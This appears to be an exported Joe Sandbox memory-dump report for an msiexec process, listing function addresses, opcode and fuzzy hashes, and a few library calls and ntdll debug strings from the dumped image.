Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7593589748fe58ebe6b76fe8aa9b4cc6d00adf9190d993faf708bb06205eebe3
Instruction ID: ab69b04163a38b02ac841759ec65127125c960b5975c997f5a68a2ca1ffa8780
Opcode Fuzzy Hash: 7593589748fe58ebe6b76fe8aa9b4cc6d00adf9190d993faf708bb06205eebe3
Instruction Fuzzy Hash: 2590023920540402DD18715C5C4464600469BD1315F66E411A0425518D8754CDB1A121

Function 243E2DB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32ae54dac74347a90f5a779ed8fdb7121b93d51cea7c063348fac4ac3dddc5e6
Instruction ID: 04debba6d13aff1055b9212c69f32954ada38e0d5369fcb94114394737949bd2
Opcode Fuzzy Hash: 32ae54dac74347a90f5a779ed8fdb7121b93d51cea7c063348fac4ac3dddc5e6
Instruction Fuzzy Hash: 8E90023524540402D949715C48446060009ABD1255FA6D012A0425514E8755CF66AA61

Function 243E2DD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 090c75cf164c9458318d0565e20445342229047d30c9460b961bf4aef92194a6
Instruction ID: 2f7048b0959a3e9c87fd203dc9ac7464680e7b9bc99b80970c0d58b612c867ae
Opcode Fuzzy Hash: 090c75cf164c9458318d0565e20445342229047d30c9460b961bf4aef92194a6
Instruction Fuzzy Hash: 0B900225246441525D4DB15C48445074006ABE12557A6D012A1415910C8726DD66D621

Function 243E2E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1e4e30a8d477da9861c09ded5d24ecb8dac82ee4de86b9a7b7e695d37803969
Instruction ID: 5507cf7847afc27f2e3daf2fde425e3214291ae32ff5a04352825258cbd13374
Opcode Fuzzy Hash: a1e4e30a8d477da9861c09ded5d24ecb8dac82ee4de86b9a7b7e695d37803969
Instruction Fuzzy Hash: AB90022530540402D90A715C48546060009DBD2359FA6D012E1425515D8725CE63A132

Function 243E2EA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 069c08e86af8672210fc39f2c3b45e9da5008d4bd25adb2d0727efb79ae250e1
Instruction ID: 462e718998b9c2beaf0819478575707551bdcf9cf26ca65cbd84704cccd2f281
Opcode Fuzzy Hash: 069c08e86af8672210fc39f2c3b45e9da5008d4bd25adb2d0727efb79ae250e1
Instruction Fuzzy Hash: 9A90027520540402D948715C484474600059BD1315F66D011A5065514E8759CEE56665

Function 243E2E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c280f7a6565dad0900299964e0ba64b63a660d88e5b201570a03702f2512192
Instruction ID: a7265f464b43633f6562652a204da97045d5f21a2c1b25fa6c1f24bd272bcde4
Opcode Fuzzy Hash: 5c280f7a6565dad0900299964e0ba64b63a660d88e5b201570a03702f2512192
Instruction Fuzzy Hash: A290022560540502D909715C4844616000A9BD1255FA6D022A1025515ECB25CEA2A131

Function 243E2EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d04a1461033dcd3b74f1ceadcc6bd836c82ea122cce787a083e9faf58ae87777
Instruction ID: 94042f527119496e6630f3eec87c05c13b60c9a51d23dfffeae87afe1d7da426
Opcode Fuzzy Hash: d04a1461033dcd3b74f1ceadcc6bd836c82ea122cce787a083e9faf58ae87777
Instruction Fuzzy Hash: E490026520580403D948755C4C4460700059BD1316F66D011A2065515E8B29CD616135

Function 243E2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 824f33c58a9c3521aabaa06fd69f1ad11424272277a21dd4614d5f3af8d51a61
Instruction ID: 7daa63c05f870f83cd4ad212bd4445774c0f6bc2ae51b17f9a74d32fb6706c39
Opcode Fuzzy Hash: 824f33c58a9c3521aabaa06fd69f1ad11424272277a21dd4614d5f3af8d51a61
Instruction Fuzzy Hash: A890026534540442D908715C4854B060005DBE2315F66D015E1065514D8719CD626126

Function 243E2F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6981a17ae1acd1e0272bbbfbe857421b33588b0bb1e7d11ff88b318473fc488
Instruction ID: 4de017c1dbdbce61215a642381c64316f8c3ae6ae47a5be797399e254d612d7d
Opcode Fuzzy Hash: f6981a17ae1acd1e0272bbbfbe857421b33588b0bb1e7d11ff88b318473fc488
Instruction Fuzzy Hash: 3990026521540042D90C715C484470600459BE2215F66D012A2155514CC729CD715125

Function 243E2FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce7fdff1a467c7dda34ef1f7759fc92e4f951e1b225e9f108a811764b4d4a203
Instruction ID: a08931ff97c5c4185ee47fad6afb42228ce8d8eb8dfb1729cb4ca0557b494392
Opcode Fuzzy Hash: ce7fdff1a467c7dda34ef1f7759fc92e4f951e1b225e9f108a811764b4d4a203
Instruction Fuzzy Hash: 45900225605400424948716C8C849064005BFE2225766D121A0999510D8759CD755665

Function 243E2FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2455016fcbf328f6e7b1a86336579ee352a3b29f4d394a685c72a519bcde2838
Instruction ID: eea2c5b5e981744b779cc2d36896815bd3871125e7fb126dd3c8807613e801b1
Opcode Fuzzy Hash: 2455016fcbf328f6e7b1a86336579ee352a3b29f4d394a685c72a519bcde2838
Instruction Fuzzy Hash: 8790023520580402D908715C4C4874700059BD1316F66D011A5165515E8765CDA16531

Function 243E2F90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03ed7d4b2bea953cda0f747ec921c4541ebe4b424c672399a458486a6afc9c3a
Instruction ID: db97249204b80a34d0380f5190d692f334f372d116c5c52e16b141bce9f554e2
Opcode Fuzzy Hash: 03ed7d4b2bea953cda0f747ec921c4541ebe4b424c672399a458486a6afc9c3a
Instruction Fuzzy Hash: 9290023520580402D908715C4C5470B00059BD1316F66D011A1165515D8725CD616571

Function 243E2FE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aee1a08a52fdf8e32a8201c8ebd429a3a4369ea11066ea2e7b470e80922fd996
Instruction ID: 305bff77280034e21ded541e2f4aaf57820df6c964c7b6a80d4bc21f6198d86a
Opcode Fuzzy Hash: aee1a08a52fdf8e32a8201c8ebd429a3a4369ea11066ea2e7b470e80922fd996
Instruction Fuzzy Hash: 97900225215C0042DA08756C4C54B0700059BD1317F66D115A0155514CCB15CD715521

Function 243E39B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdc64d7426b23ecaeefabbee2ccc808044fd10ea8a48db841888337a6baed83a
Instruction ID: 7a907ee142992781fc931ce7cef43633b175edeb01bbfba5c8c7e9b16246edab
Opcode Fuzzy Hash: fdc64d7426b23ecaeefabbee2ccc808044fd10ea8a48db841888337a6baed83a
Instruction Fuzzy Hash: F990022524945102D958715C48446164005BBE1215F66D021A0815554D8755CD656221

Function 243E2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca26b70fab4cae7878eba0543a530a3564ec194da49558d5dabb84c8e5d62aad
Instruction ID: 42f3185c5e6b0ee5f5635a5c9393411f52cefe0c8e6fbfc7579ef446e5675179
Opcode Fuzzy Hash: ca26b70fab4cae7878eba0543a530a3564ec194da49558d5dabb84c8e5d62aad
Instruction Fuzzy Hash: 499002A5205540924D08B25C8844B0A45059BE1215B66D016E1055520CC725CD619135

Function 243E2AF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb9dc8dd3671f125bb93c00ebc8b7ef21d16106910381d6c8c85698823c94ccc
Instruction ID: d563b6193055844554ba963e7d923cca3d488f605a2deaee16b8ad2105fa47a7
Opcode Fuzzy Hash: cb9dc8dd3671f125bb93c00ebc8b7ef21d16106910381d6c8c85698823c94ccc
Instruction Fuzzy Hash: 8690022922540002094DB55C0A4450B0445ABD73653A6D015F1417550CC721CD755321

Function 243E2AD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 343405c614a4d55bdca7f70b641f1ce6b32221c5a2f046ee39c8ed036ea13c85
Instruction ID: af191258112ff242722942d83f2a40fa09b4fe92ec90449a4bf3264218f7c2de
Opcode Fuzzy Hash: 343405c614a4d55bdca7f70b641f1ce6b32221c5a2f046ee39c8ed036ea13c85
Instruction Fuzzy Hash: D290022921540003090DB55C0B4450700469BD6365366D021F1016510CD721CD715121

Function 243E2B60 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02ed0e24ac3393ff53a5fab26d97d4dcbb60e52b429b023376c4ae17c8b1162c
Instruction ID: 5f1f904caf4f19507714a15d5e949886ca9584264e17ac32439a3a865b05b094
Opcode Fuzzy Hash: 02ed0e24ac3393ff53a5fab26d97d4dcbb60e52b429b023376c4ae17c8b1162c
Instruction Fuzzy Hash: 6F90026520640003490D715C4854616400A9BE1215B66D021E1015550DC725CDA16125

Function 243E2BA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9ee40e07a3623974f91ed7221ee3e5da1b668794ce9d97b621a6fd2c992ecfb
Instruction ID: bb89678f1b845b8d6afb6aa4a31b581ac6e5550077d3b3022923601d04a5a1e9
Opcode Fuzzy Hash: d9ee40e07a3623974f91ed7221ee3e5da1b668794ce9d97b621a6fd2c992ecfb
Instruction Fuzzy Hash: B090023560940802D958715C485474600059BD1315F66D011A0025614D8755CF6576A1

Function 243E2B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6fdaae861a54da24f166237fef4e0c9e8160cbb66d8ab21f6e39f40d5456cb3
Instruction ID: 10ecbe7198d18e7cd335021b0c2e30ef49005e94f27d5a1919cd5b7a92784fd9
Opcode Fuzzy Hash: d6fdaae861a54da24f166237fef4e0c9e8160cbb66d8ab21f6e39f40d5456cb3
Instruction Fuzzy Hash: 0190023520540802D90C715C4C4468600059BD1315F66D011A6025615E9765CDA17131

Function 243E2BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fb72bc62899983e601592b51acf6c95d6b7a9f94d337b2924396abbf0ec5c33
Instruction ID: 610bdeaa7a3c1bfa7b9255ac820dcc08583e08c347ec5b95dc06b9df98a3f29f
Opcode Fuzzy Hash: 1fb72bc62899983e601592b51acf6c95d6b7a9f94d337b2924396abbf0ec5c33
Instruction Fuzzy Hash: EC90023520540802D988715C484464A00059BD2315FA6D015A0026614DCB15CF6977A1

Function 243E2BE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27dced0f07ba4d525c3919f8309a9c3d6c87abced4c93fc7f5b6100478470a7c
Instruction ID: 4fbc97de2716f724c62afaeba54449f9d53cd3dd5943990153cd0d7898ef9ab4
Opcode Fuzzy Hash: 27dced0f07ba4d525c3919f8309a9c3d6c87abced4c93fc7f5b6100478470a7c
Instruction Fuzzy Hash: 2790023520944842D948715C4844A4600159BD1319F66D011A0065654D9725CE65B661

Function 243E2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 465cbc8ebe4f9f1bd4aa152f58857d98324a38e9e17c78e976cd3bc47e5d60c7
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 243E2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___swprintf_l.LIBCMT ref: 243E293C
___swprintf_l.LIBCMT ref: 243E295E
___swprintf_l.LIBCMT ref: 243E29A3
___swprintf_l.LIBCMT ref: 2441A52E

Strings

ffff:, xrefs: 2441A504
:%u.%u.%u.%u, xrefs: 2441A5B8
::%hs%u.%u.%u.%u, xrefs: 2441A527
::ffff:0:%u.%u.%u.%u, xrefs: 2441A54E

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: bed66ed9e90a2cd2228a3f2e13654baa71f584f53b46bcb87509d647dfe170d5
Instruction ID: 622eb111a525f5293111fd3b7edcc8e8543dacf3ba45fd1cda8fca42d26b84ea
Opcode Fuzzy Hash: bed66ed9e90a2cd2228a3f2e13654baa71f584f53b46bcb87509d647dfe170d5
Instruction Fuzzy Hash: 8151D7B6B04126AFDB11DB988C9097EFBB8BF08204710816AF5ADD7645D334DE51CBA0

Function 243D7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 24414655
ExecuteOptions, xrefs: 244146A0
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 244146FC
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 24414725
CLIENT(ntdll): Processing section info %ws..., xrefs: 24414787
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 24414742
Execute=1, xrefs: 24414713

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: a86566a91a4573938a466cbaad040c6eb6c9924881d8606e2b2c0e6fb786a653
Instruction ID: 9a5258510ec1b0903fadb642975dc8d648a885eedb5a8c8a5ef65aa3e7d9d111
Opcode Fuzzy Hash: a86566a91a4573938a466cbaad040c6eb6c9924881d8606e2b2c0e6fb786a653
Instruction Fuzzy Hash: 20511833600619BBFF11EAA5DC95FAA77B8EF18700F5004E9E609A71D1EB319A45CF50

Function 243EB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 243EB6BF

Strings

-, xrefs: 243EB650
+, xrefs: 243EB65A
0, xrefs: 243EB66F
0, xrefs: 243EB695

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 12c4b4c62090d02a5a144e95bc4434864afa34565f062b70ff7e5f715e196b54
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
